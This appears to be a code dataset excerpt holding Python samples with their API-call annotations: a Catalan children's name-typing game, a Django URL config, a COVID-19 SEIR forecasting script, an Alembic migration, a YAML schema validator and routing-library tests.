print("Command Line Arguments List:" + str(sys.argv))
if len(sys.argv) != 2:
print("Per funcionar s'ha de cridar el programa amb un nom. Per exemple: $ python joc-escriu-nom.py MARTI")
sys.exit()
nom = sys.argv[1].upper()
if len(nom) < 2:
print("El nom ha de ser de 2 lletres o mes")
sys.exit()
index = 0
nomEscrit = "";
#imgOK = Image.open("bb8.png")
#imgKO = Image.open("darkvader.jpg")
digues("Escriu " + nom)
while index < len(nom):
print("Has d'escriure \"" + nom + "\" i has escrit \"" + nomEscrit + "\". Escriu una lletra:")
print(nom + " -> " + nomEscrit)
digues("Busca la lletra " + nom[index])
keyPressed = readchar.readchar().upper()
if keyPressed == "EXIT":
sys.exit()
if len(keyPressed) > 1:
#imgKO.show()
p = subprocess.Popen(["display", "darkvader.jpg"])
digues("Només has d'escriure una lletra. Torna-ho a provar")
p.kill()
#imgKO.close()
else:
if nom[index] != keyPressed:
#imgKO.show()
p = subprocess.Popen(["display", "darkvader.jpg"])
digues("NO. Has escrit la " + keyPressed + ". Torna-ho a provar")
p.kill()
#imgKO.close()
else:
if index < (len(nom) - 1):
nomEscrit = nomEscrit + keyPressed
index = index + 1
#digues("Perfecte. Ara escriu la " + ordinal(index) + " lletra")
else:
#imgOK.show()
p = subprocess.Popen(["display", "bb8.png"])
digues("Ja has acabat. Ho has fet molt bé")
p.kill()
#imgOK.close()
index = index + 1
print("Fi del joc. Torna-ho a provar amb un altre nom")
#digues("Fi del jòc. Si vols, torna-ho a provar amb un altre nòm")
| [
"subprocess.Popen",
"readchar.readchar",
"gtts.gTTS",
"sys.exit",
"os.system"
] | [((307, 334), 'gtts.gTTS', 'gTTS', ([], {'text': 'frase', 'lang': '"""ca"""'}), "(text=frase, lang='ca')\n", (311, 334), False, 'from gtts import gTTS\n'), ((365, 415), 'os.system', 'os.system', (['"""vlc --play-and-exit --quiet frase.mp3"""'], {}), "('vlc --play-and-exit --quiet frase.mp3')\n", (374, 415), False, 'import os\n'), ((929, 939), 'sys.exit', 'sys.exit', ([], {}), '()\n', (937, 939), False, 'import sys\n'), ((1037, 1047), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1045, 1047), False, 'import sys\n'), ((1452, 1462), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1460, 1462), False, 'import sys\n'), ((1526, 1572), 'subprocess.Popen', 'subprocess.Popen', (["['display', 'darkvader.jpg']"], {}), "(['display', 'darkvader.jpg'])\n", (1542, 1572), False, 'import subprocess\n'), ((1387, 1406), 'readchar.readchar', 'readchar.readchar', ([], {}), '()\n', (1404, 1406), False, 'import readchar\n'), ((1771, 1817), 'subprocess.Popen', 'subprocess.Popen', (["['display', 'darkvader.jpg']"], {}), "(['display', 'darkvader.jpg'])\n", (1787, 1817), False, 'import subprocess\n'), ((2232, 2272), 'subprocess.Popen', 'subprocess.Popen', (["['display', 'bb8.png']"], {}), "(['display', 'bb8.png'])\n", (2248, 2272), False, 'import subprocess\n')] |
from django.conf import settings
from django.conf.urls import include
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path
# Root URL configuration: delegate everything to the sitio app.
urlpatterns = [
    path('', include('apps.sitio.urls', namespace='sitio')),
]

# In development only, let Django itself serve static and media assets.
if settings.DEBUG:
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) \
        + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

# Custom views rendered for 404 and 500 responses.
handler404 = 'apps.sitio.views.handler404'
handler500 = 'apps.sitio.views.handler500'
"django.conf.urls.include",
"django.conf.urls.static.static"
] | [((295, 358), 'django.conf.urls.static.static', 'static', (['settings.STATIC_URL'], {'document_root': 'settings.STATIC_ROOT'}), '(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n', (301, 358), False, 'from django.conf.urls.static import static\n'), ((378, 439), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (384, 439), False, 'from django.conf.urls.static import static\n'), ((206, 251), 'django.conf.urls.include', 'include', (['"""apps.sitio.urls"""'], {'namespace': '"""sitio"""'}), "('apps.sitio.urls', namespace='sitio')\n", (213, 251), False, 'from django.conf.urls import include\n')] |
import os
import pandas as pd
from rivm_loader import rivm
from constants import CoronaConstants
import datetime as dt
from mobility_seir import *
import copy
'''
Create forecasts without confidence intervals.
Always check for inclusion of mobility or not!!!
'''
# Estimated national infectious prevalence per date ("besmettelijk"), from RIVM.
fn = os.path.join(os.path.dirname(__file__), 'data/COVID-19_prevalentie.json')
df_besmettelijk = pd.read_json(fn).set_index('Date')
# Remember the default contact rate so it can be restored every iteration.
Avg_contacts = CoronaConstants.contacts_average
# State starting date and horizon:
start_date = "01-07-2020"
end_date = "31-12-2020"
date_format = '%d-%m-%Y'
start_date_number = dt.datetime.strptime(start_date,date_format)
end_date_number = dt.datetime.strptime(end_date,date_format)
# Days of RIVM history used to initialise each forecast.
Look_into_past = 7
# Pre-estimated transmission rates (local/mobility) per date.
Trans_rates = pd.read_csv("results_forecasting/Trans_rates_NB_mob_final_new.csv").set_index('date')
horizon = 14    # long forecast horizon (days)
horizon_2 = 7   # short forecast horizon (days)
# 7-day rolling averages of the estimated rates; .shift(0) is a no-op,
# presumably kept from earlier experiments with shifted windows.
Trans_rates['local_avg7'] = Trans_rates['rate_loc'].rolling(7).mean().shift(0)
Trans_rates['mob_avg7'] = Trans_rates['rate_mob'].rolling(7).mean().shift(0)
#Trans_rates['mob_avg7'] = 0
Trans_rates['pos_avg7'] = Trans_rates['frac_pos'].rolling(7).mean().shift(0)
Trans_rates['mobility_avg7'] = Trans_rates['mobility'].rolling(7).mean().shift(0)
# Create dataframe dictionaries
dfs_RIVM = pd.DataFrame(columns = ['name','date',
                   'susceptible','exposed','infected_tested',
                   'infected_nottested',
                   'removed_tested','removed_nottested','inhabitant']).set_index(['name','date'])
dfs_pred = pd.DataFrame(columns = ['name','date',
                   'susceptible','exposed','infected_tested',
                   'infected_nottested',
                   'removed_tested','removed_nottested']).set_index(['name','date'])
dfs_pred_daily = {}
columns_2 = ['name','date','pred','outcome','diff','rel_diff']
# Accumulators: 14-day, 7-day and "today" (hindcast) comparison tables.
# NOTE(review): DataFrame.append is deprecated and removed in pandas >= 2.0;
# collecting frames in a list and calling pd.concat once is the migration path.
df_return = pd.DataFrame(columns = columns_2)
df_return_2 = pd.DataFrame(columns = columns_2)
df_return_today = pd.DataFrame(columns = columns_2)
# Walk day by day through the evaluation window, fitting and forecasting
# from each date in turn.
for t in range(0, (end_date_number - start_date_number).days + 1):
    day_difference = dt.timedelta(days = t)
    Current_date_number = start_date_number + day_difference
    Current_date = Current_date_number.strftime('%d-%m-%Y')
    print('Date:',Current_date)
    #Compute right starting date for RIVM simulations
    RIVM_date_number = Current_date_number - dt.timedelta(days = Look_into_past)
    RIVM_date_str = RIVM_date_number.strftime('%d-%m-%Y')
    RIVM_date = rivm.date2mmdd(RIVM_date_number)
    init_df = rivm.SEI2R2_init(RIVM_date)
    # Calibrate the tested fraction against the national prevalence estimate.
    Num_tested = sum(init_df["infected_tested"])
    Est_besmettelijk = df_besmettelijk.at[Current_date_number,'prev_avg']
    CoronaConstants.fraction_tested = Num_tested / Est_besmettelijk
    init_df_02 = rivm.SEI2R2_init(mmdd=RIVM_date, undetected_multiplier=1 / CoronaConstants.fraction_tested)
    # Archive the (rescaled) RIVM initial state for this date.
    HELP_df = init_df_02
    HELP_df["date"] = RIVM_date_str
    HELP_df = HELP_df.reset_index()
    HELP_df = HELP_df.set_index(['index','date']).rename(columns = {'index':'name'})
    dfs_RIVM = dfs_RIVM.append(HELP_df)
    #Set new constants:
    # NOTE(review): these are mutations of CoronaConstants *class* attributes,
    # i.e. global state shared with the model below - assignment order matters.
    CoronaConstants.contacts_average = Avg_contacts
    current_row = Trans_rates.loc[RIVM_date_str]
    rate_loc = current_row['local_avg7']
    rate_mob = current_row['mob_avg7']
    frac_pos = current_row['frac_pos']
    CoronaConstants.average_total_mobility = current_row['mobility_avg7']
    #Compute epsilon, fraction p
    Fraction_local_contacts = 1 / (2*CoronaConstants.average_total_mobility / CoronaConstants.population_nl *rate_mob / rate_loc + 1)
    transmission_prob = rate_loc / CoronaConstants.contacts_average / Fraction_local_contacts
    #transmission_prob = rate_loc / Fraction_local_contacts
    #CoronaConstants = CoronaConstants(fraction_local_contacts = Fraction_local_contacts,
    #                                 transmission_prob = transmission_prob)
    CoronaConstants.fraction_local_contacts = Fraction_local_contacts
    CoronaConstants.transmission_prob = transmission_prob
    #CoronaConstants = CoronaConstants(**{'transmission_prob':transmission_prob})
    # Simulate far enough to cover the look-back window plus the 14-day horizon.
    seir_model = MobilitySEIR(init_df_02,horizon = horizon + Look_into_past, start_date = Current_date_number.strftime('%d-%m-%Y'),
                             time_dependency = False,
                             constants = CoronaConstants(transmission_prob = transmission_prob))
    seir_model.simulate_all()
    Current_end_date_number = Current_date_number + dt.timedelta(days = horizon)
    Current_end_date = Current_end_date_number.strftime('%d-%m-%Y')
    # Predicted state at the long horizon, indexed like the RIVM frames.
    HELP_df = seir_model.state_at_horizon()
    HELP_df = HELP_df.reset_index()
    HELP_df['date'] = Current_end_date
    HELP_df = HELP_df.set_index(['name','date'])
    #Compute horizon comparison (14-day horizon)
    Pred_state_begin = seir_model.state_at_time(Look_into_past)
    Pred_state_end = seir_model.state_at_time(horizon + Look_into_past)
    #if r == r_eff_estimate and mob_red == 1-fraction_mobility:
    mmdd_end = rivm.date2mmdd(Current_date_number + dt.timedelta(days = horizon) )
    mmdd_begin = rivm.date2mmdd(Current_date_number)
    # Newly reported infections over the horizon: predicted vs realised.
    df_pred_It = Pred_state_end['infected_tested'] + Pred_state_end['removed_tested'] - Pred_state_begin['infected_tested'] - Pred_state_begin['removed_tested']
    df_real = rivm.SEI2R2_init(mmdd_end) - rivm.SEI2R2_init(mmdd_begin)
    df_real_It = df_real['infected_tested'] + df_real['removed_tested']
    df_diff = abs(df_pred_It - df_real_It)
    df_rel_diff = abs(df_pred_It - df_real_It)/df_real_It * 100
    data = [
        [
            a,
            Current_date,
            df_pred_It[a],
            df_real_It[a],
            df_diff[a],
            df_rel_diff[a]
        ]
        for a,x in df_pred_It.items()
    ]
    columns_2 = ['name','date','pred','outcome','diff','rel_diff']
    # NOTE(review): DataFrame.append is removed in pandas >= 2.0; collect the
    # per-date frames in a list and pd.concat once when migrating.
    df_new = pd.DataFrame(data=data,columns=columns_2)
    df_return = df_return.append(df_new)
    #Compute horizon comparison (7-day horizon)
    Pred_state_begin = seir_model.state_at_time(Look_into_past)
    Pred_state_end = seir_model.state_at_time(horizon_2 + Look_into_past)
    mmdd_end = rivm.date2mmdd(Current_date_number + dt.timedelta(days = horizon_2) )
    mmdd_begin = rivm.date2mmdd(Current_date_number)
    df_pred_It = Pred_state_end['infected_tested'] + Pred_state_end['removed_tested'] - Pred_state_begin['infected_tested'] - Pred_state_begin['removed_tested']
    df_real = rivm.SEI2R2_init(mmdd_end) - rivm.SEI2R2_init(mmdd_begin)
    df_real_It = df_real['infected_tested'] + df_real['removed_tested']
    df_diff = abs(df_pred_It - df_real_It)
    df_rel_diff = abs(df_pred_It - df_real_It)/df_real_It * 100
    data = [
        [
            a,
            Current_date,
            df_pred_It[a],
            df_real_It[a],
            df_diff[a],
            df_rel_diff[a]
        ]
        for a,x in df_pred_It.items()
    ]
    columns_2 = ['name','date','pred','outcome','diff','rel_diff']
    df_new_2 = pd.DataFrame(data=data,columns=columns_2)
    df_return_2 = df_return_2.append(df_new_2)
    #Compute horizon comparison (today)
    # Hindcast check: how well the simulated look-back window matched the
    # reported case counts up to today.
    Pred_state_begin = seir_model.state_at_time(0)
    Pred_state_end = seir_model.state_at_time(Look_into_past)
    mmdd_end = rivm.date2mmdd(Current_date_number)
    mmdd_begin = rivm.date2mmdd(Current_date_number - dt.timedelta(days = Look_into_past))
    df_pred_It = Pred_state_end['infected_tested'] + Pred_state_end['removed_tested'] - Pred_state_begin['infected_tested'] - Pred_state_begin['removed_tested']
    df_real_It = rivm.rivm_corona(mmdd_end) - rivm.rivm_corona(mmdd_begin)
    df_diff = abs(df_pred_It - df_real_It)
    df_rel_diff = abs(df_pred_It - df_real_It)/df_real_It * 100
    data = [
        [
            a,
            Current_date,
            df_pred_It[a],
            df_real_It[a],
            df_diff[a],
            df_rel_diff[a]
        ]
        for a,x in df_pred_It.items()
    ]
    columns_2 = ['name','date','pred','outcome','diff','rel_diff']
    df_new_today = pd.DataFrame(data=data,columns=columns_2)
    df_return_today = df_return_today.append(df_new_today)
    # Store the predicted horizon state and the daily reported-infection series.
    dfs_pred = dfs_pred.append(HELP_df)
    dfs_pred_daily[Current_end_date] = seir_model.daily_reported_infections()
| [
"rivm_loader.rivm.SEI2R2_init",
"constants.CoronaConstants",
"pandas.read_csv",
"datetime.datetime.strptime",
"os.path.dirname",
"rivm_loader.rivm.rivm_corona",
"rivm_loader.rivm.date2mmdd",
"pandas.DataFrame",
"datetime.timedelta",
"pandas.read_json"
] | [((581, 626), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['start_date', 'date_format'], {}), '(start_date, date_format)\n', (601, 626), True, 'import datetime as dt\n'), ((644, 687), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['end_date', 'date_format'], {}), '(end_date, date_format)\n', (664, 687), True, 'import datetime as dt\n'), ((1897, 1928), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'columns_2'}), '(columns=columns_2)\n', (1909, 1928), True, 'import pandas as pd\n'), ((1945, 1976), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'columns_2'}), '(columns=columns_2)\n', (1957, 1976), True, 'import pandas as pd\n'), ((1997, 2028), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'columns_2'}), '(columns=columns_2)\n', (2009, 2028), True, 'import pandas as pd\n'), ((285, 310), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (300, 310), False, 'import os\n'), ((2120, 2140), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 't'}), '(days=t)\n', (2132, 2140), True, 'import datetime as dt\n'), ((2505, 2537), 'rivm_loader.rivm.date2mmdd', 'rivm.date2mmdd', (['RIVM_date_number'], {}), '(RIVM_date_number)\n', (2519, 2537), False, 'from rivm_loader import rivm\n'), ((2558, 2585), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['RIVM_date'], {}), '(RIVM_date)\n', (2574, 2585), False, 'from rivm_loader import rivm\n'), ((2794, 2890), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', ([], {'mmdd': 'RIVM_date', 'undetected_multiplier': '(1 / CoronaConstants.fraction_tested)'}), '(mmdd=RIVM_date, undetected_multiplier=1 / CoronaConstants.\n fraction_tested)\n', (2810, 2890), False, 'from rivm_loader import rivm\n'), ((5230, 5265), 'rivm_loader.rivm.date2mmdd', 'rivm.date2mmdd', (['Current_date_number'], {}), '(Current_date_number)\n', (5244, 5265), False, 'from rivm_loader import rivm\n'), ((5947, 5989), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'data', 'columns': 'columns_2'}), 
'(data=data, columns=columns_2)\n', (5959, 5989), True, 'import pandas as pd\n'), ((6323, 6358), 'rivm_loader.rivm.date2mmdd', 'rivm.date2mmdd', (['Current_date_number'], {}), '(Current_date_number)\n', (6337, 6358), False, 'from rivm_loader import rivm\n'), ((7041, 7083), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'data', 'columns': 'columns_2'}), '(data=data, columns=columns_2)\n', (7053, 7083), True, 'import pandas as pd\n'), ((7337, 7372), 'rivm_loader.rivm.date2mmdd', 'rivm.date2mmdd', (['Current_date_number'], {}), '(Current_date_number)\n', (7351, 7372), False, 'from rivm_loader import rivm\n'), ((8081, 8123), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'data', 'columns': 'columns_2'}), '(data=data, columns=columns_2)\n', (8093, 8123), True, 'import pandas as pd\n'), ((364, 380), 'pandas.read_json', 'pd.read_json', (['fn'], {}), '(fn)\n', (376, 380), True, 'import pandas as pd\n'), ((723, 790), 'pandas.read_csv', 'pd.read_csv', (['"""results_forecasting/Trans_rates_NB_mob_final_new.csv"""'], {}), "('results_forecasting/Trans_rates_NB_mob_final_new.csv')\n", (734, 790), True, 'import pandas as pd\n'), ((1227, 1393), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['name', 'date', 'susceptible', 'exposed', 'infected_tested',\n 'infected_nottested', 'removed_tested', 'removed_nottested', 'inhabitant']"}), "(columns=['name', 'date', 'susceptible', 'exposed',\n 'infected_tested', 'infected_nottested', 'removed_tested',\n 'removed_nottested', 'inhabitant'])\n", (1239, 1393), True, 'import pandas as pd\n'), ((1526, 1678), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['name', 'date', 'susceptible', 'exposed', 'infected_tested',\n 'infected_nottested', 'removed_tested', 'removed_nottested']"}), "(columns=['name', 'date', 'susceptible', 'exposed',\n 'infected_tested', 'infected_nottested', 'removed_tested',\n 'removed_nottested'])\n", (1538, 1678), True, 'import pandas as pd\n'), ((2395, 2428), 'datetime.timedelta', 'dt.timedelta', ([], 
{'days': 'Look_into_past'}), '(days=Look_into_past)\n', (2407, 2428), True, 'import datetime as dt\n'), ((4599, 4625), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'horizon'}), '(days=horizon)\n', (4611, 4625), True, 'import datetime as dt\n'), ((5441, 5467), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['mmdd_end'], {}), '(mmdd_end)\n', (5457, 5467), False, 'from rivm_loader import rivm\n'), ((5470, 5498), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['mmdd_begin'], {}), '(mmdd_begin)\n', (5486, 5498), False, 'from rivm_loader import rivm\n'), ((6534, 6560), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['mmdd_end'], {}), '(mmdd_end)\n', (6550, 6560), False, 'from rivm_loader import rivm\n'), ((6563, 6591), 'rivm_loader.rivm.SEI2R2_init', 'rivm.SEI2R2_init', (['mmdd_begin'], {}), '(mmdd_begin)\n', (6579, 6591), False, 'from rivm_loader import rivm\n'), ((7642, 7668), 'rivm_loader.rivm.rivm_corona', 'rivm.rivm_corona', (['mmdd_end'], {}), '(mmdd_end)\n', (7658, 7668), False, 'from rivm_loader import rivm\n'), ((7671, 7699), 'rivm_loader.rivm.rivm_corona', 'rivm.rivm_corona', (['mmdd_begin'], {}), '(mmdd_begin)\n', (7687, 7699), False, 'from rivm_loader import rivm\n'), ((4460, 4512), 'constants.CoronaConstants', 'CoronaConstants', ([], {'transmission_prob': 'transmission_prob'}), '(transmission_prob=transmission_prob)\n', (4475, 4512), False, 'from constants import CoronaConstants\n'), ((5182, 5208), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'horizon'}), '(days=horizon)\n', (5194, 5208), True, 'import datetime as dt\n'), ((6273, 6301), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'horizon_2'}), '(days=horizon_2)\n', (6285, 6301), True, 'import datetime as dt\n'), ((7427, 7460), 'datetime.timedelta', 'dt.timedelta', ([], {'days': 'Look_into_past'}), '(days=Look_into_past)\n', (7439, 7460), True, 'import datetime as dt\n')] |
"""empty message
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2019-06-20 16:08:32.621912
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'  # unique identifier of this migration
down_revision = '<PASSWORD>'  # migration that must be applied before this one
branch_labels = None  # this revision introduces no named branches
depends_on = None  # no cross-branch dependencies
def upgrade():
    """Create the ``predictor_category`` table and its predictor-id index."""
    table_name = 'predictor_category'
    op.create_table(
        table_name,
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('value', sa.String(), nullable=False),
        sa.Column('predictor_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['predictor_id'], ['predictor.id']),
        sa.PrimaryKeyConstraint('id'),
    )
    # Non-unique index to speed up lookups of categories by predictor.
    op.create_index(
        op.f('ix_predictor_category_predictor_id'),
        table_name,
        ['predictor_id'],
        unique=False,
    )
def downgrade():
    """Reverse :func:`upgrade`: drop the index, then the table."""
    table_name = 'predictor_category'
    op.drop_index(op.f('ix_predictor_category_predictor_id'), table_name=table_name)
    op.drop_table(table_name)
| [
"sqlalchemy.ForeignKeyConstraint",
"alembic.op.drop_table",
"alembic.op.f",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.Integer",
"sqlalchemy.String"
] | [((1013, 1048), 'alembic.op.drop_table', 'op.drop_table', (['"""predictor_category"""'], {}), "('predictor_category')\n", (1026, 1048), False, 'from alembic import op\n'), ((573, 632), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['predictor_id']", "['predictor.id']"], {}), "(['predictor_id'], ['predictor.id'])\n", (596, 632), True, 'import sqlalchemy as sa\n'), ((640, 669), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (663, 669), True, 'import sqlalchemy as sa\n'), ((696, 738), 'alembic.op.f', 'op.f', (['"""ix_predictor_category_predictor_id"""'], {}), "('ix_predictor_category_predictor_id')\n", (700, 738), False, 'from alembic import op\n'), ((932, 974), 'alembic.op.f', 'op.f', (['"""ix_predictor_category_predictor_id"""'], {}), "('ix_predictor_category_predictor_id')\n", (936, 974), False, 'from alembic import op\n'), ((424, 436), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (434, 436), True, 'import sqlalchemy as sa\n'), ((478, 489), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (487, 489), True, 'import sqlalchemy as sa\n'), ((538, 550), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (548, 550), True, 'import sqlalchemy as sa\n')] |
import yaml
from util import AttrDict
class SchemaOrField(object):
    """Common base for schema entries.

    Tracks whether the entry is optional and which default value to
    substitute when an optional entry is absent.
    """

    def __init__(self, optional=False, default=None):
        # True when a value for this entry may be omitted from the input.
        self.optional = optional
        # Value used in place of a missing optional entry.
        self.default = default

    def is_optional(self):
        """Return True when this entry may be omitted."""
        return self.optional

    def keyify(self, parents, key=None):
        """Join *parents* (and optionally *key*) into a dotted path string."""
        parts = parents if key is None else parents + [key]
        return ".".join(parts)
class Schema(SchemaOrField):
    """This is a general purpose class to allow enforcing of schemas
    from python dicts."""

    def __init__(self, schema_dict, **kwargs):
        SchemaOrField.__init__(self, **kwargs)
        # Maps an expected key to the Schema or Field describing its value.
        self.schema_dict = schema_dict

    def __str__(self):
        return str({key: str(val) for (key, val) in self.schema_dict.items()})

    def get_missing_required_keys(self, _dict):
        """Return the required schema keys that are absent from *_dict*."""
        # Fix: is_optional is a method; the previous code negated the bound
        # method object itself ("not schema_or_field.is_optional"), which is
        # always False, so no key was ever considered required.
        # Also: dict.iteritems() was removed in Python 3 -- use items().
        required = [key for (key, schema_or_field) in self.schema_dict.items()
                    if not schema_or_field.is_optional()]
        present_keys = _dict.keys()
        return [key for key in required if key not in present_keys]

    def get_variable_key(self, key):
        """Return the variable name for keys spelled "_name", else None."""
        if key and key[0] == '_':
            return key[1:]
        return None

    def validate(self, value, parents=None):
        """Recursively validate *value* against this schema.

        :param value: candidate value; must be a dict for a Schema node.
        :param parents: chain of parent keys used to build error messages.
        :return: tuple ``(failures, validated)`` -- a list of human readable
            error strings and an :class:`AttrDict` of validated values
            (``None`` when validation cannot proceed).
        """
        # None default avoids sharing one mutable list between calls.
        if parents is None:
            parents = []
        # Schemas are recursively enforced
        failed = []
        succeeded = {}
        if isinstance(value, dict):
            _dict = value
            variables = [(self.get_variable_key(k), v) for (k, v) in self.schema_dict.items() if self.get_variable_key(k)]
            if variables and len(variables) != 1:
                err = "schema has mixed variable and fixed settings here {}".format(self.keyify(parents))
                return [err], None
            if variables:  # for variables, we iterate on each (key, value) in received dict
                variable_name, schema = variables[0]
                if not value.values():
                    failed.append("{} missing dict for variable \"{}\" and schema {}".format(self.keyify(parents), variable_name, schema))
                # dict.iteritems() was removed in Python 3; items() is equivalent here.
                for (key, subval) in value.items():
                    _failed, _succeeded = schema.validate(subval, parents + [key])
                    for fail in _failed:
                        failed.append(fail)
                    if _succeeded:
                        _succeeded[variable_name] = key
                        succeeded[key] = _succeeded
            else:  # for non-variables, we enforce the schema key by key
                for (key, schema_or_field) in self.schema_dict.items():
                    subval = _dict.get(key)
                    if subval is not None:  # optional case is checked after
                        try:
                            _failed, _succeeded = schema_or_field.validate(subval, parents + [key])
                            succeeded[key] = _succeeded
                            for fail in _failed:
                                failed.append(fail)
                        except AttributeError:
                            err_str = "value {} for key {} is not field or schema".format(schema_or_field, self.keyify(parents, key))
                            return [err_str], None
            for missing_key, missing_schema in [(mk, ms) for (mk, ms) in self.schema_dict.items() if mk not in succeeded.keys()]:
                if missing_schema.is_optional():
                    succeeded[missing_key] = missing_schema.default
                elif not self.get_variable_key(missing_key):  # variable keys handled above
                    failed.append("required key {} missing".format(self.keyify(parents, missing_key)))
            return failed, AttrDict(succeeded)
        else:
            err_str = "key {} expected to be schema {} but is real value {}".format(self.keyify(parents), self, value)
            return [err_str], None
class Field(SchemaOrField):
    """Leaf schema entry that validates a single value against a Python type."""

    def __init__(self, field_type, **kwargs):
        SchemaOrField.__init__(self, **kwargs)
        # The type the value must be, or be coercible to.
        self.field_type = field_type

    def __str__(self):
        return str(self.field_type)

    def validate(self, value, parents):
        """Validate *value*, coercing it to ``field_type`` when possible.

        :param value: candidate value.
        :param parents: chain of parent keys used to build error messages.
        :return: ``(failures, validated)`` -- a list of error strings and
            the (possibly coerced) value, or ``None`` on failure.
        """
        validated = value if isinstance(value, self.field_type) else None
        if validated is None:
            try:  # supports validating int strings as ints for example
                validated = self.field_type(value)
            except (ValueError, TypeError):  # merged two identical no-op handlers
                pass
        if validated is not None:
            return [], validated
        return ["{} value({}) doesn't match desired type({})".format(self.keyify(parents), value, self.field_type)], None
class SchemaParser(object):
    """Validates schemas"""

    @staticmethod
    def from_yaml_file(path, schema):
        """Validate a schema from a yaml file.

        :return: the ``(failures, validated)`` tuple from
            :meth:`Schema.validate`, or ``(None, message)`` on I/O or
            YAML parse errors.
        """
        try:
            # Context manager closes the handle (the old bare open() leaked it).
            # safe_load prevents arbitrary object construction from untrusted
            # YAML; plain yaml.load() without a Loader is also a TypeError in
            # PyYAML >= 6.
            with open(path, 'r') as yaml_file:
                parsed = yaml.safe_load(yaml_file)
            return Schema(schema).validate(parsed)
        except IOError:
            return None, "No such file: {}".format(path)
        except yaml.YAMLError as ye:
            return None, "YAML file invalid: {}".format(str(ye))
| [
"util.AttrDict"
] | [((2935, 2954), 'util.AttrDict', 'AttrDict', (['succeeded'], {}), '(succeeded)\n', (2943, 2954), False, 'from util import AttrDict\n')] |
# -*- coding: utf-8 -*-
from watson.routing import routers
from pytest import raises
from tests.watson.routing.support import sample_request
class TestDict(object):
    """Tests for the dict-based router."""

    def test_create(self):
        router = routers.Dict()
        assert router
        assert repr(router) == '<watson.routing.routers.Dict routes:0>'

    def test_instantiate_with_routes(self):
        router = routers.Dict({
            'home': {
                'path': '/'
            }
        })
        assert len(router) == 1

    def test_add_child_routes(self):
        router = routers.Dict({
            'home': {
                'path': '/',
                'children': {
                    'about': {
                        'path': 'about'
                    }
                }
            }
        })
        assert len(router) == 2

    def test_add_child_routes_complex(self):
        # Raw strings avoid the invalid "\w" escape DeprecationWarning while
        # keeping the regex value byte-identical.
        router = routers.Dict({
            '1st': {
                'path': '/home',
                'children': {
                    '2nd': {
                        'path': '/:test',
                        'requires': {'test': r'\w+'},
                        'children': {
                            '3rd': {
                                'path': '/:tada'
                            }
                        }
                    }
                }
            }
        })
        request = sample_request(PATH_INFO='/home/blah')
        assert router.match(request).route.name == '1st/2nd'
        request = sample_request(PATH_INFO='/home/blah/tada')
        route_match = router.match(request)
        assert route_match.route.name == '1st/2nd/3rd'
        assert route_match.route.requires['test'] == r'\w+'
        assert len(router) == 3

    def test_match_route(self):
        request = sample_request()
        router = routers.Dict({
            'home': {
                'path': '/'
            }
        })
        assert next(router.matches(request))
        assert router.match(request)
        assert not router.match(sample_request(PATH_INFO='/test'))

    def test_match_priority_similar_path(self):
        router = routers.Dict({
            'page1': {
                'path': '/page[/:id[/:blah]]',
            },
            'page2': {
                'path': '/page[/:id[/:blah[/:something]]]',
                'priority': 2
            }
        })
        request = sample_request(PATH_INFO='/page')
        match = router.match(request)
        assert match.route.name == 'page2'

    def test_no_match_route(self):
        request = sample_request()
        router = routers.Dict({
            'home': {
                'path': '/about'
            }
        })
        with raises(StopIteration):
            next(router.matches(request))

    def test_assemble(self):
        router = routers.Dict({
            'home': {
                'path': '/'
            }
        })
        assert router.assemble('home') == '/'
        with raises(KeyError):
            router.assemble('no_route')
class TestList(object):
    """Tests for the list-based router."""

    def test_create(self):
        list_router = routers.List()
        assert list_router

    def test_instantiate_with_routes(self):
        definitions = [{'name': 'home', 'path': '/'}]
        list_router = routers.List(definitions)
        assert len(list_router) == 1

    def test_invalid_route(self):
        bad_definition = {'invalid': 'home', 'path': '/'}
        with raises(Exception):
            routers.List([bad_definition])

    def test_multiple_priorities(self):
        list_router = routers.List([
            {'name': 'about', 'path': '/about'},
            {'name': 'home', 'path': '/'},
        ])
        assert len(list_router) == 2
        first_route_name = list(list_router.routes.items())[0][0]
        assert first_route_name == 'about'

    def test_add_child_routes(self):
        child = {'name': 'about', 'path': 'about'}
        parent = {'name': 'home', 'path': '/', 'children': [child]}
        list_router = routers.List([parent])
